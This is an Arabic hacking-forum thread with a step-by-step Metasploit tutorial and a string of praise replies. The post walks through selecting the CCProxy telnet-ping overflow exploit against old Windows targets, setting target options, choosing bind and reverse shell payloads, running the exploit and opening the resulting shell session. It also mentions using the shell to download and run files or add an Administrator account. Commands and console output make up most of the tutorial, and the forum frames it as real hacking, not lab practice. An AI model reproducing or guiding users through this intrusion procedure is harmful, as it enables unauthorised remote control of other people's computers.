![]() |
شرح استغــلال ثغرات الميتا اسبلويت -- والاوفــر فلــو -- للمتقدمين مشروع الميتا اسبلويت اولا هذا الشرح ليس للمستوي المبتدأ يحتوي على عدد كبير من ثغرات الأنظمة و البرامج الجاهزة للاستغلال بالاضافة للعديد من الأدوات التي تساعدنا على اكتشاف ثغرات كود: Buffer overflow كما يحتوي علي قاعدة بيانات Shellcode و Opcode تساعد مكتشفي الثغرات على برمجة و كتابة استغلالاتهم بكل سهولة قبل البداية بالشرح أحب اقول عدة اشياء الميتا اسبلويت استخدامها سهل وبسيط بالاضافه الي انوا من اقوي الاختراق وضعت لكم هذا الشرح من باب الغرض العلمي رغم اعتزالي للهكر ولكن لرغبة احد الاصدقاء نبدا علي بركة الله اولا تنصيب الفرام وورك الخاص بالوينندوز او اللينكس بعد تنصيب البرنامج بيكون معه بعض الاداوت الخاصه مثل n map بعد اتمام عملية التنصيب بنجاح تظهر لك شاشة مشابهه لشاشة الدوس اتركها حتي ينتهي البرنامج بحفظ البيانات بالجهاز واكمال الادوات http://www12.0zz0.com/2009/01/01/18/669258662.jpg بعد اتمام كل شئ تظهر لك شاشة الترحيب http://www12.0zz0.com/2009/01/01/18/846750031.jpg اوك لحد هنا تمامـ ثانيا نفتح البرنامج اصحاب اللينكس بيكون البرنامج متواجد علي هذا المسار / كود: pentest/exploits/framework3/ من قايمة start -- all program http://www12.0zz0.com/2009/01/01/18/363343742.jpg انت الان تتعامل مع شاشة مثل شاشة الدوس الصغير لها محث msf< لاظهار معلومات عن الاوامر الخاصة بالميتا نستخدم الامر هيلب سيكون كتابة جميع اوامر الميتا علي هذا المنوال كود: msf > help http://www12.0zz0.com/2009/01/01/18/628656384.jpg اهم اوامر الثغرات هي اقتباس:
2- الامرinfo exploit لعرض معلومات عن الثغرة والبرامج التي تشتغل عليها 3- الامر use exploit لاستخدام الثغرة والدخول لعيها يعني في جميع الثغرات اللي راح نستخدمها لها طريقة في التنفيذ الامر ليس بصعب كل ما عليك هو انك هتتبع 4 خطوات راح اقولك عليهم وتكون مرتاح وشغال تمامـ 1- نستعرض ثغرات المسروع الموجودة والمتاحه لنا بالاصدار بالامر show exploits 2- نختار الثغرة اللي راح نطبق عليها ونظهر معلومات عنها بالامر info exploit 3- ندخل علي الثغرة ونطبق الاتصال معها بالامر use exploit نبدأ بعرض الثغرات كود: show exploits وعرض الاوفر فلو Overflow Samba lsa_io_trans_names Heap Overflow solaris/samba/trans2open Samba trans2open Overflow (Solaris SPARC) solaris/sunrpc/sadmind_adm_build_path Sun Solaris sadmind adm_build_path() Buffer Overflow solaris/sunrpc/sadmind_exec Solaris sadmind Command Execution solaris/sunrpc/ypupdated_exec Solaris ypupdated Command Execution solaris/telnet/fuser Sun Solaris Telnet Remote Authentication Bypass Vulnerability solaris/telnet/ttyprompt Solaris in.telnetd TTYPROMPT Buffer Overflow test/aggressive Internal Aggressive Test Exploit test/exploitme MIPS Aggressive Test Exploit test/kernel Internal Kernel-mode Test Exploit unix/misc/distcc_exec DistCC Daemon Command Execution unix/misc/spamassassin_exec SpamAssassin spamd Remote Command Execution unix/smtp/clamav_milter_blackhole ClamAV Milter Blackhole-Mode Remote Code Execution unix/webapp/awstats_configdir_exec AWStats configdir Remote Command Execution http://www12.0zz0.com/2009/01/01/18/340174375.jpg تم اظهار ثغرات كثيرة وبجانب كل ثغرة البرنامج التي تشتغل علية الثغرة مثل النظام والاصدار التي تشتغل علية ولاظهار معلومات اكتر سنتخدم الامر info مثال كود: info windows/tftp/tftpdwin_long_filename Name: TFTPDWIN v0.4.2 Long Filename Buffer Overflow Version: 5773 Platform: Windows Privileged: No License: Metasploit Framework License (BSD) Provided by: patrick <> Available targets: Id Name -- ---- 0 Universal - tftpd.exe Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 69 yes The target port Payload information: Space: 284 Avoid: 1 characters Description: This module exploits the ProSysInfo TFTPDWIN threaded TFTP Server. By sending an overly long file name to the tftpd.exe server, the stack can be overwritten. لنأخذ اقوي الثغرات ونجرب عليها / كود: proxy/ccproxy_telnet_ping كود: info windows/proxy/ccproxy_telnet_ping وهو معلومات عن الثغرة والمنافذ المفتوحه وكيف لنا ان ندخل من خلالها كما تلاحظون بدا بعرض الثغرات Windows 2000 Pro All - English 1 Windows 2000 Pro All - Italian 2 Windows 2000 Pro All - French 3 Windows XP SP0/1 - English 4 Windows XP SP2 - English Name Current Setting Required Description Payload information: http://www12.0zz0.com/2009/01/01/18/999408842.jpg في هذه الثغرة يوجد لدينا خيارين أساسيين الأول هو IP السيرفر الذي يستعمل برنامج CCProxy الثاني فهو المنفذ الذي يستخدمه البرنامج, لا ننسى تحديد النظام فهذا شيء مهم في ثغرات Metasploit خصوصا أنظمة Windows اي خيار خاطئ نحدده لن يمكننا من استغلال الثغرة بشكل صحيح الأن ننفذ الأمر use لنستخدم الثغرة كود: use windows/proxy/ccproxy_telnet_ping معني ذلك اننا في حالة تصنت http://www12.0zz0.com/2009/01/01/18/890528820.jpg الان نستخدم الامر show لعرض خيارات الثغرة المتاجه لنا exploit(ccproxy_telnet_ping) > show options http://www12.0zz0.com/2009/01/01/18/976831605.jpg اظهر لنا rehost وهو اي بي الجهاز الان نبدأ باستهداف هذا الجهاز بالامر كود: set rhost 127.0.0.1 ويمكن تغييرة حسب المستخدم باستخدام الامر كود: set RPORT 21 باستخدام الامر show targets تكون النتيجه http://www12.0zz0.com/2009/01/01/18/131400942.jpg >> show targets Exploit targets: Id Name -- ---- 0 Windows 2000 Pro All - Italian 2 Windows 2000 Pro All - French 3 Windows XP SP0/1 - English 4 Windows XP SP2 - English الان لدينا 5 انظمة نختار احدهم انا راح اختار النظام رقم واحد كود: Windows 2000 Pro All - English 1 set TARGET 1 http://www12.0zz0.com/2009/01/01/18/751159740.jpg بعد ذلك نقوم باظهار الاستغلال المتاحه كود: show payloads Trap generic/debug_trap/bind_ipv6_tcp Generic x86 Debug Trap, Bind TCP Stager (IPv6) generic/debug_trap/bind_nonx_tcp Generic x86 Debug Trap, Bind TCP Stager (No NX Support) generic/debug_trap/bind_tcp Generic x86 Debug Trap, Bind TCP Stager generic/debug_trap/reverse_http Generic x86 Debug Trap, PassiveX Reverse HTTP Tunneling Stager generic/debug_trap/reverse_ipv6_tcp Generic x86 Debug Trap, Reverse TCP Stager (IPv6) generic/debug_trap/reverse_nonx_tcp Generic x86 Debug Trap, Reverse TCP Stager (No NX Support) generic/debug_trap/reverse_ord_tcp Generic x86 Debug Trap, Reverse Ordinal TCP Stager generic/debug_trap/reverse_tcp Generic x86 Debug Trap, Reverse TCP Stager generic/shell_bind_tcp Generic Command Shell, Bind TCP Inline generic/shell_reverse_tcp Generic Command Shell, Reverse TCP Inline windows/dllinject/bind_ipv6_tcp Windows Inject DLL, Bind TCP Stager (IPv6) windows/dllinject/bind_nonx_tcp Windows Inject DLL, Bind TCP Stager (No NX Support) windows/dllinject/bind_tcp Windows Inject DLL, Bind TCP Stager windows/dllinject/reverse_http اختار انت اي استغلال يناسبك نجرب علي هذا الاستغلال windows/shell_bind_tcp طريقة التنفيذ set PAYLOAD windows/shell_bind_tcp http://www12.0zz0.com/2009/01/01/19/914503919.jpg تستطيع فتح منفذ و الاتصال به عن طريق أداة الـ Netcat, تحميل ملف و تشغيله أو حتى اضافة مستخدم جديد للنظام بصلاحيات Administrator الان نظهر الخيارات للثغرة نستخدم الامر show options ظهر لنا الخيارات المتاحه كاي دي الجهاز والمنفذ 4444 ولاستخدام الاتصال العكسي بدل الثغرة السابقه نختار كود: windows/shell_reverse_tcp set PAYLOAD windows/shell_reverse_tcp وبعدها اظهار show options وهكذا علي اي ثغرة نكمل علي الثغرة الثانيه وهي الاتصال العكسي يمكننا الأن تحديد خيارات الاستغلال مثل LHOST وهو IP جهازنا و LPORT هو المنفذ الذي سيتم الاتصال العكسي عن طريقه بتنفيذ الأمر: set LHOST 127.0.0.1 http://www8.0zz0.com/2009/01/01/19/755457674.jpg الان نطبق الامر exploit اذا كانت جميع الخيارات صحيحة سيتم تنفيذ الاستغلال لرؤية الاتصالات العكسية واظهاراها نستخدم الامر sessions -l لتكون النتيجه >> sessions -l Active sessions 1 Command shell 127.0.0.1:23443 -> 127.0.0.1:1024 اما في حالة No active sessions. فأن هناك خطأ بالاتصال ولنتصل باول اتصال نقوم بتنفيذ الامر كود: sessions -i 1 ولعمل تحديث لثغرات الميتا ننفذ الامر كود: svn update تحميل البرنامج موقع الميتا اسبلويت الخاص بالفرام وورك البرنامج الخاص بالويندوز البرنامج الخاص باللينكس راجع الدرس مرة واتنين وتلاته راح تلقاه سهل وبسيط |
موضوع رائع بارك الله فيك شكراوالله |
موضوع جميل جاري اعادة قراءة الموضوع شكرا لك ع الطرح المفيد |
موضوع حلو بس أخي وين البرامج واللهواللهواللهوالله |
مشكــــورين المرــوور تم رفع روابط التحميل لعيونك ابو رعــد :) |
مشكور كثير حبيبي موضوع مميز من عضو مميز لك الاحترام والتقدير |
موضوع روعة من عضو اروع ...شكرا يا غالي |
وربي مبدع هو دا الاختراق الحقيقي في انتظار مواضيع اخرى . ويعطيك العافية يا بطل |
شرح رائع واكثر من رائع يستحق الانجااااز في الهكر العربي اهنيك اخوي على الشرح الرائع واصل ابداعك يامبدع الله يوفقك انشاءالله تقبل مرووووري اخي |
شرح اكثر من رائع هذا هو الاختراق الحقيقي وانا بوجد في درس مثل هذا سوف يكون بالفديو ان شاء الله ولكن مايقدر يفهمه الكل |
موضوع رائع بارك الله فيك |
اشكرك اخي على موضوعك الرائع ننتظر من الأخ ازري اينو ان يضع الشرح بالفيديو ليكون أسهل ان شاء الله |
مشكور........................................ ...مش كور مشكور...........مشكور.......................م شكور. ........مشكور مشكور......................مشكور......مشكور....... ............مشكور مشكور...........تسلمــــ.........مشكور....... ..ايد كــــــ........مشكور مشكور............................................. ...............مشكور مشكور....................... مشكور ...….................مشكور مشكور............................................. ....مشكور مشكور.......Thanks !!!!!!!!!!!!!..........مشكور مشكور....................................مشكو ر مشكور...........................مشكور مشكور................مشكور مشكور.......مشكور مشكور |
|
رد: شرح استغــلال ثغرات الميتا اسبلويت -- والاوفــر فلــو -- للمتقدمين مشكوووووووووووووووووووووووووووووووووووووووور |
الساعة الآن 11:07 AM |
[ vBspiders.Com Network ]